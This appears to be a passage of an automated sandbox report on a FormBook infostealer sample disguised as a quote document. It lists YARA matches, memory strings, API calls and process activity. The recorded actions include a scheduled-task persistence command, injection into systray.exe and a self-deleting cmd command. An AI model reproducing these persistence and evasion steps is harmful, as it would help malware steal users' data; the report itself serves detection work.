Source: quote20210126.exe.exe	String found in binary or memory: http://tempuri.org/RealProjectDataSet4.xsd
Source: quote20210126.exe.exe	String found in binary or memory: http://tempuri.org/RealProjectDataSet4.xsdUhttp://tempuri.org/RealProjectDataSet5.xsd
Source: quote20210126.exe.exe	String found in binary or memory: http://tempuri.org/RealProjectDataSet5.xsd
Source: quote20210126.exe.exe	String found in binary or memory: http://tempuri.org/RealProjectDataSet6.xsd
Source: quote20210126.exe.exe	String found in binary or memory: http://tempuri.org/RealProjectDataSet6.xsdUhttp://tempuri.org/RealProjectDataSet7.xsd
Source: quote20210126.exe.exe	String found in binary or memory: http://tempuri.org/RealProjectDataSet7.xsd
Source: explorer.exe, 00000009.00000002.2095501897.0000000002B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 00000006.00000002.701320257.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2092044926.0000000000750000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.663461491.0000000003F39000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.702172131.0000000001370000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.663915045.00000000041FE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.702000441.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2093805951.0000000002C00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2093723727.00000000029D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 6.2.quote20210126.exe.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.quote20210126.exe.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000006.00000002.701320257.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.701320257.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.2092044926.0000000000750000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.2092044926.0000000000750000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.663461491.0000000003F39000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.663461491.0000000003F39000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.702172131.0000000001370000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.702172131.0000000001370000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.663915045.00000000041FE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.663915045.00000000041FE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.702000441.0000000000F10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.702000441.0000000000F10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.2093805951.0000000002C00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.2093805951.0000000002C00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.2093723727.00000000029D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.2093723727.00000000029D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.quote20210126.exe.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.quote20210126.exe.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.quote20210126.exe.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.quote20210126.exe.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Contains functionality to call native functions

Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 6_2_0041A050 NtClose,	6_2_0041A050
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 6_2_0041A100 NtAllocateVirtualMemory,	6_2_0041A100
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 6_2_00419F20 NtCreateFile,	6_2_00419F20
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 6_2_00419FD0 NtReadFile,	6_2_00419FD0
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 6_2_0041A04F NtClose,	6_2_0041A04F
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 6_2_0041A0FB NtAllocateVirtualMemory,	6_2_0041A0FB
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 6_2_00419F1B NtCreateFile,	6_2_00419F1B
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 6_2_00419FCD NtReadFile,	6_2_00419FCD

Detected potential crypto function

Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 0_2_014294A8	0_2_014294A8
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 0_2_0142DB4C	0_2_0142DB4C
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 0_2_0142C148	0_2_0142C148
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 0_2_0142E214	0_2_0142E214
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 0_2_0142A758	0_2_0142A758
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 0_2_061D6338	0_2_061D6338
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 0_2_061DCB2D	0_2_061DCB2D
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 0_2_061D632B	0_2_061D632B
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 0_2_061D0006	0_2_061D0006
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 0_2_061D0040	0_2_061D0040
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 0_2_061D106F	0_2_061D106F
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 6_2_00401030	6_2_00401030
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 6_2_0041D15A	6_2_0041D15A
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 6_2_00402D87	6_2_00402D87
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 6_2_00402D90	6_2_00402D90
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 6_2_0041DE7E	6_2_0041DE7E
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 6_2_00409E2C	6_2_00409E2C
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 6_2_00409E30	6_2_00409E30
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 6_2_0041DF67	6_2_0041DF67
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 6_2_00402FB0	6_2_00402FB0

PE file contains strange resources

Source: quote20210126.exe.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: nVnzZjnYhVWWZd.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Sample file is different than original file name gathered from version info

Source: quote20210126.exe.exe, 00000000.00000002.666244925.0000000006760000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs quote20210126.exe.exe
Source: quote20210126.exe.exe, 00000000.00000002.666604019.0000000006850000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs quote20210126.exe.exe
Source: quote20210126.exe.exe, 00000000.00000002.666604019.0000000006850000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs quote20210126.exe.exe
Source: quote20210126.exe.exe, 00000000.00000002.661896304.0000000000BB8000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameBase64FormattingOptions.exe> vs quote20210126.exe.exe
Source: quote20210126.exe.exe, 00000000.00000002.663025131.0000000002F68000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSoapName.dll2 vs quote20210126.exe.exe
Source: quote20210126.exe.exe, 00000000.00000002.665966908.0000000006090000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamePositiveSign.dll< vs quote20210126.exe.exe
Source: quote20210126.exe.exe, 00000003.00000002.657721102.00000000000F8000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameBase64FormattingOptions.exe> vs quote20210126.exe.exe
Source: quote20210126.exe.exe, 00000004.00000000.658569476.0000000000488000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameBase64FormattingOptions.exe> vs quote20210126.exe.exe
Source: quote20210126.exe.exe, 00000005.00000002.660030041.00000000003D8000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameBase64FormattingOptions.exe> vs quote20210126.exe.exe
Source: quote20210126.exe.exe, 00000006.00000002.701554067.0000000000978000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameBase64FormattingOptions.exe> vs quote20210126.exe.exe
Source: quote20210126.exe.exe, 00000006.00000002.702248040.00000000013A3000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamesystray.exej% vs quote20210126.exe.exe
Source: quote20210126.exe.exe, 00000006.00000002.703364193.000000000165F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs quote20210126.exe.exe
Source: quote20210126.exe.exe	Binary or memory string: OriginalFilenameBase64FormattingOptions.exe> vs quote20210126.exe.exe

Tries to load missing DLLs

Source: C:\Users\user\Desktop\quote20210126.exe.exe

Section loaded: onecoreuapcommonproxystub.dll

Source: 00000006.00000002.701320257.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.701320257.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.2092044926.0000000000750000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.2092044926.0000000000750000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.663461491.0000000003F39000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.663461491.0000000003F39000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.702172131.0000000001370000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.702172131.0000000001370000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.663915045.00000000041FE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.663915045.00000000041FE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.702000441.0000000000F10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.702000441.0000000000F10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.2093805951.0000000002C00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.2093805951.0000000002C00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.2093723727.00000000029D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.2093723727.00000000029D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.quote20210126.exe.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.quote20210126.exe.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.quote20210126.exe.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.quote20210126.exe.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: quote20210126.exe.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: nVnzZjnYhVWWZd.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6968:120:WilError_01
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Mutant created: \Sessions\1\BaseNamedObjects\vVuqKiKGyZXyP
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6808:120:WilError_01

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\quote20210126.exe.exe 'C:\Users\user\Desktop\quote20210126.exe.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\nVnzZjnYhVWWZd' /XML 'C:\Users\user\AppData\Local\Temp\tmpC686.tmp'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\Desktop\quote20210126.exe.exe C:\Users\user\Desktop\quote20210126.exe.exe
Source: unknown	Process created: C:\Users\user\Desktop\quote20210126.exe.exe C:\Users\user\Desktop\quote20210126.exe.exe
Source: unknown	Process created: C:\Users\user\Desktop\quote20210126.exe.exe C:\Users\user\Desktop\quote20210126.exe.exe
Source: unknown	Process created: C:\Users\user\Desktop\quote20210126.exe.exe C:\Users\user\Desktop\quote20210126.exe.exe
Source: unknown	Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
Source: unknown	Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\quote20210126.exe.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\nVnzZjnYhVWWZd' /XML 'C:\Users\user\AppData\Local\Temp\tmpC686.tmp'	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process created: C:\Users\user\Desktop\quote20210126.exe.exe C:\Users\user\Desktop\quote20210126.exe.exe	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process created: C:\Users\user\Desktop\quote20210126.exe.exe C:\Users\user\Desktop\quote20210126.exe.exe	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process created: C:\Users\user\Desktop\quote20210126.exe.exe C:\Users\user\Desktop\quote20210126.exe.exe	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process created: C:\Users\user\Desktop\quote20210126.exe.exe C:\Users\user\Desktop\quote20210126.exe.exe	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\quote20210126.exe.exe'	Jump to behavior

Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 0_2_00AD767E push 00000000h; iretd	0_2_00AD76C8
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 0_2_061D575A push es; ret	0_2_061D5790
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 0_2_061D8BF4 push es; iretd	0_2_061D8C2C
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 3_2_0001767E push 00000000h; iretd	3_2_000176C8
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 4_2_003A767E push 00000000h; iretd	4_2_003A76C8
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 5_2_002F767E push 00000000h; iretd	5_2_002F76C8
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 6_2_0041D075 push eax; ret	6_2_0041D0C8
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 6_2_0041D0C2 push eax; ret	6_2_0041D0C8
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 6_2_0041D0CB push eax; ret	6_2_0041D132
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 6_2_0041D12C push eax; ret	6_2_0041D132
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 6_2_00417C67 push 0000006Bh; ret	6_2_00417C6A
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 6_2_004175F9 push edx; iretd	6_2_004175FA
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Code function: 6_2_0089767E push 00000000h; iretd	6_2_008976C8

Source: initial sample	Static PE information: section name: .text entropy: 7.59078944089
Source: initial sample	Static PE information: section name: .text entropy: 7.59078944089

Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quote20210126.exe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
